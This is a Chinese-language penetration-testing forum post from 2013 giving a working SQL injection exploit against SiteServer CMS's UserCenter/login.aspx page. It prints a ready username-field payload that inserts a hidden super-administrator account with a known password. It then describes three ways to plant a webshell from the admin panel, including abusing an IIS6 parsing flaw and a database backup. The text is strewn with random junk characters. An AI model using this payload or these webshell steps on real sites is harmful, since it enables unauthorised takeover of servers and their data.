中国网络渗透测试联盟

标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射 [打印本页]

作者: admin    时间: 2013-2-16 21:40
标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版+ C( ^6 i, X4 E; C; Q
stieserver官网:www.siteserver.cn
+ F8 f: ~. o* r& T; aEXP:
- s. S# }& f4 N7 L$ K5 u" F4 c直接访问UserCenter/login.aspx
: c$ s. E9 p/ H% M& i( t- N用户名处输入:$ F& S" n$ N0 H

' w+ f5 s) c' ]# G9 v123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–( y! A3 S; Z* e, [1 n: X
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
8 w$ g  P, b1 K, \2 `3 e之后再访问后台SiteServer/login.aspx用插入的用户登陆% T* @) [/ c! Y. F. v) U
后台拿webshell的三种方法:
2 x9 J  L% [! E# ~+ {一、+ @0 R# d+ j$ {# |
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
1 }5 d+ P9 N7 Z, |二、
3 P7 [4 O# k' U: L; l1 z" ]成员权限-》添加用户-》用户名为:1.asp% }" {+ y+ u5 X8 V
http://127.0.0.1/usercenter/7 ~/ B% Q/ O2 M/ R% y& U) E, g
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell, D1 E* N# m+ |$ {* h
(ps:后台添加用户时不会验证是否含有非法字符)
! r- m$ x9 ~; H3 }1 g% r  i0 F三、
5 @9 k- a: i' k' X  K$ c系统工具-》实用工具-》机器参数查看7 G/ ^0 b2 _1 E- ~4 P% V
可以看到数据库类型、名称,WEB路径9 u8 \( C2 B' H7 `; K
系统工具-》数据库工具-》SQL语句查询
/ z' O: g! P. \4 A这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2